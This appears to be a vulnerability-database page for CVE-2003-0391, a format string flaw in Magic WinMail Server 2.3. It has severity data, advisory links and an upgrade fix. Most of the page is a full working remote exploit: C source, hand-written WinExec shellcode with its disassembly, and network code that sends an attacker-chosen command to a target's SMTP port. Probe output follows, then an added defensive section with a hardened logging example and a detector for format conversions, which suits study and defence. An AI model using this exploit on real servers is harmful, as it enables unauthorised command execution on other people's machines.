CVE-2003-0391
CVSS 7.5
Published: 2003-07-02 00:00:00
Revised: 2016-10-17 22:33:15

[Original] Format string vulnerability in Magic WinMail Server 2.3, and possibly other 2.x versions, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via format string specifiers in the PASS command.


[CNNVD] Magic WinMail Server denial of service vulnerability (CNNVD-200307-005)

        Magic WinMail Server 2.3, and possibly other 2.x versions, contains a format string vulnerability. A remote attacker can cause a denial of service (crash), and possibly execute arbitrary code, by supplying format string specifiers in the PASS command.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: NETWORK [the attacker does not need intranet or local access]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0391
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0391
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-005
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=105370528428222&w=2
(UNKNOWN)  BUGTRAQ  20030523 Magic Winmail Server
http://www.magicwinmail.net/changelog.asp
(UNKNOWN)  MISC  http://www.magicwinmail.net/changelog.asp

- Vulnerability information

Magic WinMail Server denial of service vulnerability
High severity   Format string
2003-07-02 00:00:00 2007-04-27 00:00:00
Remote
        Magic WinMail Server 2.3, and possibly other 2.x versions, contains a format string vulnerability. A remote attacker can cause a denial of service (crash), and possibly execute arbitrary code, by supplying format string specifiers in the PASS command.

- Advisories and patches

        

- Vulnerability information (42)

Winmail Mail Server 2.3 Remote Format String Exploit (EDBID:42)
windows remote
2003-06-11 Verified
Port: 25   Author: ThreaT
N/A
/******************************************************************
 * Magic Winmail Server 2.3(Build 0402) 
 * Remote format string exploit.
 ******************************************************************
 * Coded by ThreaT.
 *
 *
 * This one takes advantage of a format bug in the 
 * >>> SMTP protocol <<< (not pop3) to execute
 * a malicious command on a vulnerable system
 *
 * usage : mwmxploit <Target IP> <command to execute remotely> [smtp port]
 * + The command to execute cannot exceed 90 characters +
 *
 * compile : cl.exe mwmxploit.c /w
 *
 ******************************************************************
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment (lib,"wsock32.lib")

int main (int argc, char *argv[])
{

	SOCKET sock;

	char buffer[1000];

	// overwrite a saved EIP by way of the format directives
	char vuln[] = 		
		"\xec\xfc\x66\x01%x%x"
		"\xed\xfc\x66\x01%x%x"
		"\xee\xfc\x66\x01"
		
		// the leading %x conversions walk the stack up to the three
		// addresses (0x0166fcec..ee) placed at the start of the string;
		// the %n/%hn conversions then store the running byte count into
		// those consecutive addresses, rebuilding the saved EIP
		"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%28x%n"
		"%97x%n%105x%hn"

/*

  This is my specific shellcode for execute a command
  over the Magic Winmail process.

  This one can contain null bytes, enjoy ! :)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Disassembly of File: mailserver.exe
Code Offset = 00001000, Code Size = 000CF000
Data Offset = 000EC000, Data Size = 0002E000
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Reference To: KERNEL32.GetModuleHandleA, Ord:0000h
:004B8850 FF15AC014D00            Call dword ptr [004D01AC]

 Reference To: KERNEL32.ExitProcess, Ord:0000h
:004B88C6 FF1598014D00            Call dword ptr [004D0198]

 Reference To: KERNEL32.GetProcAddress, Ord:0000h
:00406CE7 8B3DEC004D00            mov edi, dword ptr [004D00EC]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  //////////////////////// My shellcode \\\\\\\\\\\\\\\\\\\\\\\\\\

: EB50                    jmp 00401058
: 5E                      pop esi
: 8BEC                    mov ebp, esp
: 83EC28                  sub esp, 00000028		// set up a stack frame
: C745D84B65726E          mov [ebp-28], 6E72654B
: C745DC656C3332          mov [ebp-24], 32336C65 // store 'Kernel32' here
: C745E000000000          mov [ebp-20], 00000000
: C745E457696E45          mov [ebp-1C], 456E6957
: C745E878656300          mov [ebp-18], 00636578 // and 'WinExec' here

// drop this instruction from the shellcode if you really need
// 4 more characters for the command to execute
: C645EB00                mov [ebp-15], 00
										
: BAAC014D00              mov edx, 004D01AC
: 8D45D8                  lea eax, dword ptr [ebp-28]
: 50                      push eax
: FF12                    call dword ptr [edx]	// eax = GetModuleHandle ("Kernel32");
: 8D5DE4                  lea ebx, dword ptr [ebp-1C]
: 53                      push ebx
: 50                      push eax
: BAEC004D00              mov edx, 004D00EC
: FF12                    call dword ptr [edx]	// GetProcAddress (eax, "WinExec");
: 6A01                    push 00000001		// 1 = SW_SHOW, 0 = SW_HIDE 
: 56                      push esi
: FFD0                    call eax			// WinExec (argv[2], SW_SHOW)
: BA98014D00              mov edx, 004D0198
: FF12                    call dword ptr [edx]	// ExitProcess ();
: E8ABFFFFFF              call 00401008	

  \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ EOF /////////////////////////////////

  */
	

// Generated by Hex Workshop
// shellcode.exe - Starting Offset: 4102 (0x00001006) Length: 87 (0x00000057)

	"\x00\x90\x90\x90\x90"	// NUL ends the format string; the NOPs pad so the shellcode lands in place
	"\xEB\x50\x5E\x8B\xEC\x83\xEC\x28\xC7\x45\xD8\x4B\x65\x72\x6E\xC7" 
	"\x45\xDC\x65\x6C\x33\x32\xC7\x45\xE0\x00\x00\x00\x00\xC7\x45\xE4" 
	"\x57\x69\x6E\x45\xC7\x45\xE8\x78\x65\x63\x00\xC6\x45\xEB\x00\xBA" 
	"\xAC\x01\x4D\x00\x8D\x45\xD8\x50\xFF\x12\x8D\x5D\xE4\x53\x50\xBA" 
	"\xEC\x00\x4D\x00\xFF\x12\x6A\x01\x56\xFF\xD0\xBA\x98\x01\x4D\x00" 
	"\xFF\x12\xE8\xAB\xFF\xFF\xFF";

	SOCKADDR_IN sin;
	WSADATA wsadata;
	WORD wVersionRequested = MAKEWORD (2,0);
	int n;

	//
	printf ("* #################################### *\n"
		"  Magic Winmail Server 2.3(Build 0402)\n"
		"     Remote format string exploit !\n"
		"* #################################### *\n"
		"  Coded By ThreaT -> ThreaT\n\n");

	if (argc < 3 || strlen (argv[2]) > 90)
	{
		printf ("usage : mwmxploit <Target IP> <command to execute> [smtp port]\n\n"
			" + The command to execute cannot exceed 90 characters +\n");
		ExitProcess (0);
	}

	if ( WSAStartup(wVersionRequested, &wsadata) )
	{
		printf ("winsock initialisation error!\n");
		ExitProcess (1);		
	}

	sin.sin_family = AF_INET;
	sin.sin_port = htons (argc > 3 ? atoi (argv[3]) : 25); // optional SMTP port, default 25
	
	if ( (sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
	{
		printf ("error: the victim IP address is invalid!\n");
		ExitProcess (2);
	}

	printf ("connecting to %s on port %u...", argv[1], ntohs ( sin.sin_port ) );

	sock = socket (AF_INET, SOCK_STREAM, 0);
	if ( sock == INVALID_SOCKET || connect (sock, (SOCKADDR *)&sin, sizeof (sin)) )
	{
		printf ("error: connection failed!\n");
		ExitProcess (3);
	}

	// read the 220 banner and terminate it before printing it with %s
	n = recv (sock, buffer, sizeof (buffer) - 1, 0);
	if (n <= 0)
	{
		printf ("error: no banner received!\n");
		ExitProcess (4);
	}
	buffer[n] = '\0';
	
	printf ("ok\n-> %s\nsending exploit code...", buffer);

	// vuln[] holds an embedded NUL before the shellcode, so strlen() stops there;
	// the extra 92 bytes are the 5 NUL/NOP bytes plus the 87-byte shellcode
	send (sock, vuln, strlen (vuln) + 92, 0);  // send the format string and shellcode
	send (sock, argv[2], strlen (argv[2]), 0); // send the command
	send (sock, "\r\n", 2, 0);                 // terminate the SMTP line

	recv (sock, buffer, sizeof (buffer) - 1, 0); // remote crash :)

	puts ("ok");
	closesocket (sock);
	WSACleanup ();
}

/*
D:\toolz\netcat>nc 127.0.0.1 25
220 M1 Magic Winmail Server 2.3(Build 0402) ESMTP ready
AAAA 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 
0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.
8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 
0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
502 unimplemented (#5.5.1)
 */

/*
D:\>type "c:\Program Files\Magic Winmail\server\logs\smtp.log"
0906/Y-01:50:30   1548 Connect from 127.0.0.1
0906/Y-01:51:06   1584 unrecognized command = AAAA 0x00498f71 0x0176fd10 
0x0176fe3c 0x000000eb 0x0176ff80 0x00ee6c80 0x00000050 0x00ee60d9 0x00000102 
0x0000011f 0x00000050 0x00eecf71 0x0000001c 0x0000001f 0x0176ff74 0x004cd2c0 
0x00000001 0x00493e40 0x0176fd50 0x00000000 0x00ee5ea8 0x00ee5ea8 0x41414141 
0x25783020 0x2078382e 0x2e257830 0x30207838 0x382e2578 0x78302078 0x78382e25 
0x25783020 0x2078382e 0x2e257830

*/


// milw0rm.com [2003-06-11]
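The nc probe and the smtp.log excerpt above show the two halves of the bug: every `%x` in the client's line pops a stack word into the log, and the exploit's `%n`/`%hn` conversions turn the same code path into a write primitive. The C below is an added example, not Winmail's code and not ThreaT's exploit: it puts the vulnerable logging idiom next to its hardened form and adds the check a server should make before a protocol argument reaches any format function. The function names, the `handle_pass` wrapper and the sample lines are constructed for illustration; the real Winmail source is not on this page.

```c
/* Added example: vulnerable vs. hardened logging of a client command, plus a
 * detector for printf conversions in protocol arguments. All names and
 * sample input here are constructed; none of it is Winmail's code. */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Vulnerable pattern: the client line *is* the format string. Each "%x"
 * leaks a stack word (the 0x00498f71 ... values in the log above) and
 * "%n"/"%hn" write the running byte count to a pointer taken from the
 * stack. Kept only for contrast; never call it with untrusted input. */
#if defined(__GNUC__)
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
#endif
static int log_line_vulnerable(char *out, size_t outsz, const char *line)
{
    return snprintf(out, outsz, line);
}
#if defined(__GNUC__)
#pragma GCC diagnostic pop
#endif

/* Hardened form: the line is data, the format is a literal. */
static int log_line_safe(char *out, size_t outsz, const char *line)
{
    return snprintf(out, outsz, "unrecognized command = %s", line);
}

/* Count printf conversions in an argument and flag the write conversion.
 * "%%" is a literal percent sign, not a conversion; a dangling '%' at the
 * end of the string is ignored. */
struct fmt_scan { int conversions; bool has_n; };

static struct fmt_scan scan_format_directives(const char *s)
{
    struct fmt_scan r = {0, false};
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        /* skip flags, width, precision and length modifiers */
        const char *q = p + 1;
        while (*q && strchr("-+ #0123456789.*hlLqjzt$", *q)) q++;
        if (!*q) break;
        r.conversions++;
        if (*q == 'n') r.has_n = true;
        p = q;
    }
    return r;
}

/* Hypothetical POP3 PASS handler: reject an argument carrying conversions
 * before anything formats it. Returns 0 = accepted, 1 = rejected. */
static int handle_pass(const char *line, char *log, size_t logsz)
{
    if (strncmp(line, "PASS ", 5) != 0) {
        log_line_safe(log, logsz, line);
        return 1;
    }
    struct fmt_scan sc = scan_format_directives(line + 5);
    if (sc.conversions > 0) {
        snprintf(log, logsz, "rejected PASS with %d format conversion(s)%s",
                 sc.conversions, sc.has_n ? " including %n" : "");
        return 1;
    }
    snprintf(log, logsz, "PASS accepted for authentication");
    return 0;
}
```

The detector is a defence in depth, not the fix: the fix is `log_line_safe`, which never lets client bytes become a format. Scanning the argument is still worth doing at the edge so that probes like the `0x%.8x` line above are logged as rejections rather than silently evaluated by some other `printf`-family call further down the stack.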
		

- Vulnerability information

4921
Winmail Server PASS Command Remote Format String
Remote / Network Access, Local / Remote, Context Dependent Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability; Upgrade
Vendor Verified

- Vulnerability description

- Timeline

2003-05-24 Unknown
Unknown 2003-05-30

- Solution

Upgrade to version 2.4 (Build 0530) or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete
 

 
